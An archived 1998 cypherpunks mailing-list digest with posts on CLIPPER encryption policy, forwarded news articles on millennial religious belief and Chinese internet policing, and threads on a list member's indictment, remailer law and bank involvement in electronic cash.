11.  Explain why meetings between the CSPP and the US Government
should not come under the FACA (Federal Advisory Committee Act)
laws?

12.  Please explain Al Gore's role in CLIPPER and inside the
Inter-Agency Working Group for encryption.

13.  Please explain Ron Brown's role in CLIPPER and inside the
Inter-Agency Working Group.  Did Ron Brown discuss encryption
with representatives of China?

14.  Was the CLIPPER design or Skipjack algorithm disclosed to
any foreign government or representative?

15.  What kind of encryption policy did you discuss with CIA
Director Deutch, George Tenet and NSA Director McConnell in late
December of 1993?

16.  What role did the Federal government play in the merger of
Silicon Graphics and CRAY?

17.  Please describe the Clinton administration's role in the
"accidental" export of Silicon Graphics super-computers to a
Russian nuclear weapons lab and the exports of some 46 supers to
China.

18.  What role did the Federal government play in dealings with
Andrew Logan in 1993?  Did Mr. Logan get paid to not
sue the US Government over the CLIPPER design?

19.  What role did the Federal government and specifically AL
GORE play in the 1994 negotiations to purchase the DSA patents
from Mr. Bidzos, CEO of RSA Inc.?

20.  Please explain how you can serve on policy and still remain
part owner of Podesta & Associates without conflict?

21.  Were there or are there any plans to mandate government
encryption and nationalize the industry?

22.  Why would the Commerce Dept. reference the US government
DSA (Digital Signature) algorithm when I requested all
information on back doors or special software to monitor US
domestic financial transactions?  Does DSA contain some back
door or other exploitable feature?

23.  Explain the role of the FORTEZZA smart card as the proposed
national health care card during the 1993 Health Care reform.

24.  Does the White House hold closed meetings with other groups
covered under the FACA rules?  For example I have documents that
reference closed meetings with Dr. Willis Ware of the Computer
System Security and Privacy Advisory Board.

25.  Explain the role of AT&T and CLIPPER?  Please note I have
documents which detail the 1991 and 1992 meetings between
Scrowcroft and AT&T to purchase the initial batch of AT&T 3600
phones.  I also have details of the substitution contract to
AT&T issued in 1993 to remove the DES chips and put CLIPPER in
place.

26.  Explain the role of Mrs. Hillary Clinton in encryption
policy and project CLIPPER.

27.  Explain the relationship between the administration,
Mr. Stephens of Arkansas, his company Systematics and the
lawsuit over PROMIS software.

Again, thank you for taking the time to answer my questions.  I
would like the opportunity to follow up if possible.

Best of Wishes,

Charles R. Smith SOFTWAR

================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
53A79B0B3629F6D9F2F28DFE4000844F2FF14AA1235806369F861DA7546777BE
C10793051D8CC7ED9E0F67D3DAD2B39F113F7A74B8D6A77CE8A867CCB46A99FE
22C5DCF13BD55532
================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 26 Oct 1998 06:39:42 +0800
To: cypherpunks@cyberpass.net
Subject: Y2K is coming, and boy, is it pissed?
Message-ID: <v04020a12b258de6186c1@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



;-)

Cheers,
Bob Hettinga

--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 25 Oct 1998 07:20:06 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: 25% of Christians Expect Christ's Return in Their Lifetimes
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  NandoNet
http://www.nando.net/newsroom/ntn/nation/102498/nation1_27950_noframes.html

Third Millennium's approach raises end-time hopes, fears

Copyright (c) 1998 The Associated Press

WASHINGTON (October 24, 1998 08:50 a.m. EDT http://www.nandotimes.com) --
Jesus Christ is about to return, and the 1,500 folks packed into the
Sheraton Washington ballroom couldn't be happier.

For 16 hours a day, the End-Time Handmaidens pray and sway, singing of the
day they will "dance on streets that are golden." Around them, middle-aged
women clad in white and gold robes glide through the aisles while other
believers blow into rams' horns, their shrieks announcing the Second Coming.

The end is near. The end-timers are here.

"We're running out of time. We're running out of time," Sister Gwen Shaw,
the group's septuagenarian matriarch, says at the Handmaidens' annual
convention in 1997. "This is God's last call."

While these Handmaidens may be on America's evangelical fringe, their
beliefs about the millennium and Christ's Second Coming are remarkably
mainstream.

According to a 1997 Associated Press poll, nearly one out of every four
Christian adults -- an estimated 26.5 million people -- expect Jesus to
arrive in their lifetimes. Nearly as many -- an estimated 21.1 million
Americans -- are so sure of it that they feel an urgent need to convert
friends and neighbors.

The results are consistent with other surveys that have found a widespread
belief in the Second Coming. But the AP poll, conducted last spring by ICR
of Media, Pa., probes how Christians are acting on their beliefs.

The most fervent end-timers gather at prophecy conventions such as this one
in Washington, but their dreams and fears reverberate throughout the
country. America may have already entered what one apocalyptic scholar
calls the "hot zone" of end-time speculation: The year 2000 is far enough
away to be plausible as Christ's Second Coming, yet close enough to spark
intense proselytizing.

"I look at prophecy as a Polaroid picture that takes five minutes to
develop," says Zola Levitt, a Dallas evangelist on The Family Channel. "I'd
say we're at four minutes, 55 seconds."

At the end-timers' convention, believers pay hundreds of dollars for Jewish
liturgical instruments fashioned from rams' horns -- for the chance to play
their own small part in announcing the Second Coming. In unpracticed hands,
these shofars sound like a third-grade orchestra warming up.

Others, both in and out of the mainstream, are also blowing horns of
warning. There are best-sellers such as Pat Robertson's "The End of the
Age." Scores of broadcasters, from Jack Van Impe to Hal Lindsey, have
preached of the end times. And the Internet offers more than 100 popular
millennial sites, including This Week in Bible Prophecy and End Times Links.

For evangelical Christians, the Second Coming is what's new about the new
millennium. According to the AP poll, almost 40 percent of Christians
expect Jesus to arrive in the 21st century, if not sooner.

They are looking past Jesus' own admonition that "no one knows the hour."
By their reckoning of Biblical clues, the time is soon.

Belief in Jesus' return has underpinned Christianity from its earliest
days. Each week, Christians throughout the world recite the Apostle's
Creed, invoking Jesus who "will come again to judge the living and the
dead." Each day, many begin The Lord's Prayer, passed down by Jesus, with
"Our Father, who art in heaven, hallowed be thy name, thy kingdom come...."

But what makes today's prayers so earnest? What separates this generation
of end-time prophets from those of the last two millennia?

Israel.

The New Testament compares the kingdom of God, near at hand, to the growth
of a fig tree. Some believers substitute Israel for the tree. They say the
Second Coming is near at hand when the tree shoots forth branches -- when
Israel becomes a nation.

And that happened in 1948.

"Verily I say unto you, 'This generation shall not pass away, till all be
fulfilled,"' Jesus says in Luke 21:32.

Since many end-time prophets also place the apocalyptic Armageddon in
Israel, developments there continue to stir interest. In 1967, when Israel
reclaimed much of Jerusalem from Jordan, the prophecy in Luke was only
strengthened.

During the 1991 war between the United States and Iraq, many evangelists --
from Billy Graham to John Walvoord, chancellor of the Dallas Theological
Seminary -- envisioned the beginning of the end.

And when the 1993 Mideast peace pact was signed, radio evangelist Monte
Judah of Norman, Okla., identified the beginning of seven years'
tribulation heralding the Second Coming.

For evangelicals, signs of the end can be found anywhere, anytime.
Worldwide disasters -- floods, wars, earthquakes -- are what Jesus, in the
Gospel of Matthew, told followers to look for. The Hale-Bopp comet, famine
in Africa, developments in the European Common Market, even the convergence
of full moons and Jewish religious festivals -- all are sifted for clues of
the apocalypse.

"There's a lot happening in our time that would give most people a concern
and an excitement that the Lord is going to return," Thomas A. McMahon
says. He is executive director of the Berean Call, a religious newsletter
out of Bend, Ore., that circulates to 80,000 Christians.

"Every day has significance. Every political, social, economic event has
significance," says Phillip Lucas, general editor of Nova Religio: The
Journal of Alternative and Emergent Religions. "Your whole experience of
time is greatly heightened."

If the time is near, why not sometime around the year 2000? For end-timers
who cite a divine plan, great things tend to happen in 2,000-year periods.

Abraham and Isaac, patriarchs who established a covenant between God and
humans, were born around 2000 B.C. Two millennia later, Christians believe,
God became man with the birth of Jesus.

Those who believe human history is 6,000 years old wait with special
expectancy. Consider the mathematics in Peter's Second Letter: "One day
with the Lord is as a thousand years." For these believers, the new
millennium starts on the seventh day of creation.

For them, after 6,000 years of strife and turmoil, it's time for 1,000
years of heavenly rest as Jesus rules over the Kingdom of God on Earth.

"A lot of people think maybe the year 2000," says Leon Bates, head of the
Bible Believers' Evangelistic Association in Sherman, Texas. "I would go
along with the thought that it would be just like the Lord to have an
overall 7,000-year plan."

Oleeta Herrmann believes the end could come any time. She traveled to the
end-timers' convention from Xenia, Ohio, where three 25-foot crosses in her
back yard warn neighbors to get right with God.

Like others at the convention, she has heard the rustle of angels preparing
the way of the Lord. One night, she says, Jesus appeared in her bedroom to
reassure her that nieces and nephews would not be left behind when she is
lifted into the clouds to join others in her family who have died.

"You're bringing the rest of them with you," were the Lord's words, she says.

Willie Mae Johnson, at the convention from Lighthouse Free Methodist Church
in St. Louis, has no such assurances. What will happen to her father, her
children and other relatives who have not accepted Christ?

She is beginning to waver as 2000 approaches.

"I don't want to leave anyone behind, so you say yeah, and you say no," she
says. "I want Jesus to come back right now, but just wait a little while,
Jesus."

Even vendors at the end-timers' convention raise provocative questions,
selling T-shirts that feature three frogs plopped on a lily pad and asking:
"Where are you goin' when you croak?"

Many people are not going to make it through the tribulation. "He has given
us ... a burden for lost souls," says the Rev. Dorothy Mottern, accompanied
to the convention by church members from Fredericksburg, Va.

For those who read Revelation as a literal forecast, the future is
frightening for people without God's seal on their foreheads. In that Book,
a third of the Earth burns, and angels kill a third of those who survive.
For others, torture is so severe that "people will seek death, but will not
find it; they will long to die, but death will flee from them."

Warnings like these can change lifestyles.

In the AP poll, 98 percent of those who believe Jesus will return in their
lifetimes say they urgently need to get right with God.

About 21.1 million Americans, the poll estimates, have decided to get
others right, too, wanting to convert friends, neighbors and relatives.
Among age groups, the urgency is felt most widely among Baby Boomers. By
region, it is most prevalent in the South.

This urgency has created sweeping evangelistic campaigns. Celebrate Jesus
2000, a coalition of evangelical churches and ministries, wants to reach
the "entire nation for Christ" by the third millennium.

In an unprecedented action, the 15 million-member Southern Baptist
Convention, the nation's largest Protestant denomination, in 1996 vowed to
make special efforts to evangelize the Jews.

Of course, the end of the world has been predicted many times before.

But dates for the Second Coming have come and gone. In the 1840s, followers
of William Miller quit jobs, sold belongings and moved to upstate New York
to await the return of Jesus. He didn't come.

Two successful churches arose from the Millerite Movement: The Seventh-day
Adventists and the Jehovah's Witnesses. Both continue to anticipate the
end-times but no longer specify the date.

Charles Taze Russell, founder of the modern-day Witnesses, predicted that
the millennial age would begin in 1914. World War I raised hopes he was
right, but the movement's catchword -- "Millions now living will never die"
-- gradually lost its urgency.

Two years ago, the Witnesses officially dismissed date-setting as
speculation, declaring Jesus was right that "no one knows the place and the
time."

The Worldwide Church of God also no longer sets dates for the end-times,
partly because founder Herbert W. Armstrong was so often wrong. Hal
Lindsey's "Late Great Planet Earth" raised end-time fears in the 1970s. Now
he has a new best seller, "Planet Earth - 2000 A.D."

So what will happen this time, if life goes on?

Some worry that fringe end-times movements may act in increasingly
desperate ways. They point to the mass suicides of the Heaven's Gate and
Branch Davidian communities, whose charismatic leaders believed they had
special word from God about end-times.

However, most experts on evangelical Christianity think believers will
accept delays -- and perhaps even be a bit relieved.

In the AP poll, only 61 percent of Christian respondents who believe Jesus
will arrive in their lifetime are praying for his quick return.

Walvoord, of the Dallas Theological Seminary, says it reminds him of a
Sunday school teacher who asked the class who wants to go to heaven. When
only one boy failed to raise his hand, the teacher asked: "Don't you want
to go?"

"Yeah," the boy replied, "but I thought you were getting a load to go right
now."

By DAVID BRIGGS, AP Religion Writer
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: evan.cordes@UMICH.EDU
Date: Mon, 26 Oct 1998 06:39:53 +0800
To: cypherpunks@cyberpass.net
Subject: what's related to what's related
Message-ID: <199810251516.KAA18477@terminator.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain




From: "Bernard A. Galler" <galler@umich.edu>
Subject: Fwd: IP: Netscape's XML App -- or what is really What's Related
Newsgroups: umich.interesting.people
Date: Sun, 25 Oct 1998 08:52:32 -0500

>Delivered-To: ip-sub-1@majordomo.pobox.com
>X-Sender: dfarber@mail.earthlink.net
>Date: Sat, 24 Oct 1998 16:44:28 -0400
>To: ip-sub-1@majordomo.pobox.com
>From: Dave Farber <farber@cis.upenn.edu>
>Subject: IP: Netscape's XML App -- or what is really What's Related
>Mime-Version: 1.0
>Sender: owner-ip-sub-1@majordomo.pobox.com
>Precedence: list
>Reply-To: farber@cis.upenn.edu
>Status:
>
>Date: Sat, 24 Oct 1998 15:23:37 GMT
>From: dwiner@well.com (DaveNet email)
>Subject: Netscape's XML App
>
>-------------------------------------
>>From Scripting News... It's DaveNet!
>Released on 10/24/98; 8:23:30 AM PST
>-------------------------------------
>
>  Yesterday I got an email from Jeff Veen at Wired pointing me to the
>  server that Netscape is running its What's Related? application on.
>  This server is part of the project they did with Alexa Internet, and
>  it's the back-end for the What's Related? feature in Netscape 4.5.
>
>  I had a little time to kill, was looking for a diversion, so I sent a
>  message to Netscape's server via script and I was blown away. It's
>  XML! Yes it is. And why, oh why, didn't they tell anyone? (Or did I miss
>  something?)
>
>  Anyway, I wrote an app that talks to their server. It interfaces thru
>  an HTML form. You enter the URL of a site, and I find out what's related,
>  with a twist. The URL to the related site links back to the form, and I do
>  a lookup on *that* site, allowing you to interactively walk their
>  tree of relationships.
>
>  This is just a demonstration. I want to be sure that people interested
>  in building XML apps have a way to experience the XMLness of what
>  Netscape has done, which is very interesting, for sure.
>
>  Here's the link to my app:
>
>  <http://nirvana.userland.com/whatsRelated/>
>
>  Hope you like it!
>
>  ***Absence makes the heart do what?
>
>  Oh baby, so sorry to be gone for so long.
>
>  Sometimes the most important thing is being heard.
>
>  And sometimes it's most important to say nothing.
>
>  For the last four weeks I haven't had much to say. I've been busy and
>  quiet and more productive than I can remember ever being. What am I
>  doing? Building cool servers and editors, of course!
>
>  Stay tuned...
>
>  Dave Winer
>
>-------------------------------------------
>Scripting News: <http://www.scripting.com/>
>

Bernard A. Galler
E-mail:  galler@umich.edu
Fax: 734-668-9998




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Oct 1998 06:39:12 +0800
To: cypherpunks@toad.com
Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en (fwd)
In-Reply-To: <199810251403.IAA18873@einstein.ssz.com>
Message-ID: <199810251534.KAA17224@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Maybe the Feds have more on CJ than what's in Jeff
Gordon's complaint and it was provided to the Grand
Jury for the indictment, but maybe not. 

The alleged threat to murder federal officials surely 
ricochets noisily in governmental brainpans.

It's probable that law enforcement and judicial circles have 
a secret treasure of confidential warnings, alerts and operations 
about gland-thrilling potential threats -- of which the DoJ 
study cited here is only one peek into Pandora's twat,
wet just so to enthrall the high benchers and avid affidavites.

Domestic terrorism looms large in boosting security budgets 
and for rouging the mundane, boring justice system grinding 
ever so drearily, getting so little appreciation what with the luridities 
of the Billy-Kenny crotch graball, and the newsy African
bombings and cruise attacks -- what's a Public Servant got to
do to get what's due for self-sacrifice. Why finger an assassin, 
thank you god for Jim and CJ, for bottomless cypherpunks
conspiracy afermenting.

For example, I spoke to the Estevan police about CJ's arrest
warrant and was told that it was for a non-extraditable offense.
So there's not much pressure coming from Canada despite
Jeff's citing that background in his complaint. I asked for docs
to flesh out Jeff's complaint but couldn't get any.

Then we know that the Secret Service interviewed CJ but took
no action on his alleged threats against DC pols (and maybe 
against others -- there's another aspect of CJ threats that a 
cpunk might want to amplify).

And there's no evidence so far of FBI involvement in CJ's case,
which as noted here is somewhat hard to understand where
there's a threat of murdering federal officials. Why the IRS is the
principal investigative office for what is no longer merely an IRS 
matter is not yet answerable based on what's public.

It could be that a broader investigation is underway and Jeff's
is a cover. 

Let us pray for that, that thanks to Jim Bell and CJ we'll all be 
hyperlinked to International Terrorism, the surefire stage
for rep building, raking dollars, the spunk of cpunk.

Wasn't that the characteristics of the American Dream in the 
DoJ list of assassin traits? Particularly, the lust to be cop-killed, 
or to forfeit property fast, whichever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 26 Oct 1998 07:27:15 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Internet Police on the Prowl in China
Message-ID: <v04020a13b258ea4c543c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 25 Oct 1998 07:54:22 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Internet Police on the Prowl in China
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/digest/wtech001.htm

Internet Police on the Prowl in China

By Michael Laris
Special to The Washington Post
Saturday, October 24, 1998; Page A12

BEIJING - As head of the Shanghai Police Department's Computer
Security Supervision office, Qing Guang is in charge of ferreting out
"harmful information" on the Internet.

He has to look only as far as his own in box.

Qing is an unwitting subscriber to Chinese VIP Reference, an electronic
pro-democracy magazine run by Chinese students and scholars from a
small office near Washington's Dupont Circle. Every 10 days, editors
e-mail their magazine -- with its essays on "thought liberation," bulletins on
democracy activism, and reader-inspired reports on corruption -- to more
than 100,000 Internet users in China. Qing is one of them. And that
makes the tough-talking Shanghai cop crazy.

"For me, this kind of information is useless. When you put it in my
mailbox, it's a type of spiritual pollution. All the users don't want to
receive
these kinds of things," Qing said in a rare interview. "If there was
something you didn't need, and I sent it to you by force, could you accept
that? Would you be disgusted or not?"

The Internet is slowly coming of age in China, prompting a showdown
between Communist Party officials who seek to maintain their media
monopoly, and upstart Internet publishers relying on powerful technology
and their uncensored news coverage to appeal to China's best and
brightest.

The number of Chinese Internet users has jumped 75 percent this year to
1.2 million, and it is expected to reach 10 million in five years. Eighty-five
percent of users are under age 35, and they represent an influential elite of
students, intellectuals and officials. VIP Reference reaches at least 10
percent of Chinese users and perhaps a greater percentage if reader
surveys about how often it is forwarded are accurate.

The Chinese government is ambivalent toward the Internet.
Telecommunications officials have been investing millions of dollars to
increase Internet access, and national policy supports its swift growth, but
propaganda and security officials oppose its unfettered expansion. As
Chinese at home and abroad have become more effective at spreading
their ideas online, police and state security agents have launched a
campaign to train "Internet police" and pursue those responsible for
"hostile magazines."

"The water that carries the boat can also tip it over. The Internet is also
like this," the People's Daily, the most authoritative voice of China's
Communist Party, wrote on Oct. 12. "Going online is inevitable, but
tremendous economic benefit requires an assurance of safety."

China's leaders are not alone in their concern. New York-based Human
Rights Watch is looking into reports that governments in Malaysia, Turkey
and Bahrain have persecuted their citizens for distributing political
information online.

"It is precisely because of the Internet's potential for increasing the civil
and political participation of the disenfranchised that regulators are seeking
to control it," said Jagdish Parikh, online researcher for Human Rights
Watch.

But China's government, which relied heavily on underground propaganda
to build support for taking power in 1949, is especially sensitive about
keeping its own censorship structures in place. Authorities boast that
China was the first country to require Internet users to register with the
government, and police are institutionalizing the monitoring of the country's
networks.

In Shanghai, for instance, Officer Qing has trained more than 200
employees from government work units to be the eyes and ears of the
police on local networks. In three-day seminars, Qing describes the
dangers of "black guests," the Chinese term for hackers, and explains
Internet security. He also explains China's stringent Internet regulations,
which went into effect last January.

"No one is allowed to release harmful information on the Internet," Qing
said. "You cannot send out harmful information which attacks our nation's
territorial integrity, attacks our nation's independence, or attacks our
socialist system."

Qing would not say how many Internet cases are being prosecuted in
China, nor how many police are surfing China's networks. But in
interviews, Chinese Internet users who have had run-ins with security
forces say the pressure is growing.

Lin Hai, a computer entrepreneur in Shanghai, was arrested in March for
allegedly providing his database of 30,000 e-mail addresses to VIP
Reference. Although Lin had not been active in politics, and had openly
sold and exchanged e-mail addresses as part of his online headhunting
business, he has been charged with "inciting the overthrow of national
power."

Xu Hong, Lin's wife, said trading e-mail addresses is considered as
sinister as trafficking in postage stamps, and she believes authorities are
using her husband to send a message. "It's 'killing a chicken to scare the
monkeys,'" she said, using an old Chinese expression.

Feng Donghai, a co-founder of VIP Reference who works as a
telecommunications researcher at Columbia University, said his parents
and friends in China have been visited by state security agents four times in
the past several months to investigate him. "I also received a lot of reader
messages that they were visited by national security police because they
received our magazine," Feng said. But, like Officer Qing, many have an
alibi. "When police question our readers, they can claim they never
subscribed," Feng said.

The magazine has editors and contributors around the United States and in
China, and is part news source and part network. Democracy
campaigners in China have used it as a forum for discussing reform, and to
locate the e-mail addresses and phone numbers of fellow travelers. VIP
sends copies of its magazine not only to police officers but also to Chinese
lawmakers and government officials, as well as thousands of citizens. VIP
also e-mails a smaller-circulation daily update on dissident activities.

Readers e-mail the magazine 500 times each day. About 30 of those are
requests to be removed from the mailing list, but many others write to talk
politics.

The Chinese government has set up e-mail filters to block distribution, but
editors send the magazine from different addresses each time and have an
elaborate system within China to ensure the messages reach their
destination. Feng said he gets several dozen e-mail threats a day and has
also been hit by e-mail "bombings," which fill up his in box with large files.
Several of VIP's other key editors are trying to keep their identities secret
to escape similar trouble and to avoid being blacklisted.

The chief editor of "Public Opinion," an electronic journal edited in China
that focuses on government abuses of power, said he went into hiding
after police investigated his company.

"I was scared. Many people like me, who say things they shouldn't, have
been struck," said the editor, who gave his name as Li Yongming in an
e-mail interview from an undisclosed location in southern China. But Li
has continued working on the magazine. "I will not let others cover my
mouth," he said.

 (c) Copyright 1998 The Washington Post Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Mon, 26 Oct 1998 07:34:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en
Message-ID: <199810251100.MAA21744@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
>
> anonymous wrote
> > And it's likely they have subpoenaed more people than we've heard from.
> > I just hope they don't subpoena Bill Payne, or we'll receive a copy of it
> > every week for years to come.
> 
> Yep, with those silly/strange capitalizations and sentence structures of his
> which look suspicously like some form of stego. You'd think somebody who
> claims to be that educated would have at least learned basic grammer (unless it
> was intentional).

That explains it.

> This does raise an interesting point about freedom of speech and the duties
> of LEA's. In a democratic society what are the ethical implications of LEA's
> archiving publicly available documents as a matter of course, not for
> inclusion in ongoing investigations but rather as a base for future
> investigations.

Echelon. Also see [*1 below]

> In addition, while the remailer operators do seem to be
> protected by ECPA (I was advised that I fell into this category via SSZ)
> what about the public archive operators? Are they covered under this
> umbrella?

remailers are carriers. ECPA says that if you do not review content, you aren't
responsible for it.

Archivers are content providers. They have to make do with a 1st ammendment fig leaf.
What archives are there? There is one in Singapore (outside jurisdiction) and one
at sof.mit.edu that mysteriously went off the air a little while ago. Or was it
something more sinister?

On the topic of ECPA, I did an archive search: (my comments in [])

From: Mike Godwin <mnemonic@eff.org>
Subject: Re: FIDOnet encryption (or lack thereof)
Date: Thu, 30 Sep 1993 11:07:09 -0400 (EDT)

 
Bill writes:

> Heh.  OK.  Well, if one behaves "ethically", then I guess *that* closes
> the issue.  It's his machine and he gets to make the rules.  (this is
> my personally-adhered-to point of view)

My question is this: how does he know that the mail is encrypted if he's
not examining the mail that passes through his system? If he *is*
examining the mail that passes through his system, it seems likely that he
is violating the Electronic Communications Privacy Act.


--Mike

[hey, Jim really is protected. He's not even allowed to read CDR mail.]

To: cypherpunks@toad.com
Subject: The last word? (forwarded article)
From: fergp@sytex.com (Paul Ferguson)
Date: Fri, 02 Jul 93 00:21:16 EDT

BoardWatch Magazine
July 1993
pages 43 - 46
 
Steve Jackson Games v. US Secret Service
 
by Peter D. Kennedy

[preamble]

The Electronic Communications Privacy Act.
 
Two provisions of the Electronic Communications Privacy Act (or
ECPA) were paramount in the suit. The plaintiffs claimed the
Secret Service violated two provisions -- one prohibiting
unjustified "disclosure and use" of e-mail (18 U.S.C. 2703; the
other prohibiting "interception" of e-mail (18 U.S.C. 22511(1)).

[*1 Interesting. Maybe they have Toto for something intercepted illegally
 and they're trying to find it from another source (by subpoena).]

From: Mike Godwin <mnemonic@eff.org>
Subject: Re: Restrictions on crypto exports
Date: Sun, 19 Sep 1993 23:32:17 -0400 (EDT)

[re: public domain software on ftp archives]

It matters not, IMHO, since an ftp archive site qualifies as a library
open to the public.


--Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Mon, 26 Oct 1998 06:36:46 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Irony
In-Reply-To: <v04003a00b2579978e398@[198.115.179.81]>
Message-ID: <v04003a05b258e198f14b@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> observered:

>In German we have this concept called "schadenfreude," which basically
>means "delight at the misfortune of others."
>
>Or, more Calvinistically, delight that the chickens have come home to
>roost, that evolution is indeed working, and that people are getting what
>they earned.

	Ja, schadenfreude (a true gem of a word) is a appropriate response
to any geldverlegenheit which might bedevil some dummkopf who sneers at a
good-hearted effort to jump a language barrier.

-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 26 Oct 1998 08:28:27 +0800
To: cypherpunks@Algebra.COM
Subject: Re: so, what did Toto *do*,......
In-Reply-To: <199810251155.HAA11099@privacy.nb.ca>
Message-ID: <v03130307b25962bd6485@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:55 AM -0800 10/25/98, Joseph 'Anonymous' Howe wrote:
>Reeza! wrote:
>>
>> >all seen posted here. Personally, I found them a lot milder than Reeza!'s
>> >projection of his suicide fantasies, for instance.
>>
>> Huh? Well Goodness Fuck, Does this mean I am notorious as well?
>
>In a post primarily about your feelings about Klinton, you outlined
>a detailed suicide fantasy ("meet your maker") and suggested other people
>might like to eat a bullet too. That's closer to presidential assasination
>than Toto ever got.

But Reeza! posts from a .mil address, and .mil folks have historically had
more lattitude in deciding when and where to apply "sanctions."

--Tim May



Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 26 Oct 1998 07:28:07 +0800
To: cryptography@c2.net
Subject: e-cash, banks, systemic risk, and financial safety in the Metro
Message-ID: <v04020a1bb25943283e11@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sun, 25 Oct 1998 16:07:04 -0400 (AST)
From: Ian Grigg <iang@systemics.com>
To: dbs@philodox.com
Subject: e-cash, banks, systemic risk, and financial safety in the Metro
Cc: daveb@hyperion.com, djackson@jackson-trading.com
Reply-To: iang@systemics.com
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

I've been a faithful believer in the past that banks are not
the right organisations to get involved with electronic cash.
To some extent, this has been merely a learning exercise in
order to determine the shape and composition of the ideal
organisation that should be involved;  starting off by
rejecting the status quo is always educational.  When building
electronic cash systems, it is an obvious question to ask, and
if not, your customers soon do so for you.

Over time, another face has arisen, that of defending society
from threat of the new world being monopolised by the
dinosaurs of yesteryear.  In short, the need to keep banks
out of electronic cash.

At the end of this rant, I have attached a post from Dave
Birch of Hyperion, in which he presents some evidence of how
banks are failing in the smart card area.  This I find
personally amusing, as I argued in my paper on the EMI's 1994
Opinion that smart cards were something that the banks could
get into and sensibly monopolise.  I guess that argument now
looks somewhat weak.

Whether banks should be involved in electronic cash is part
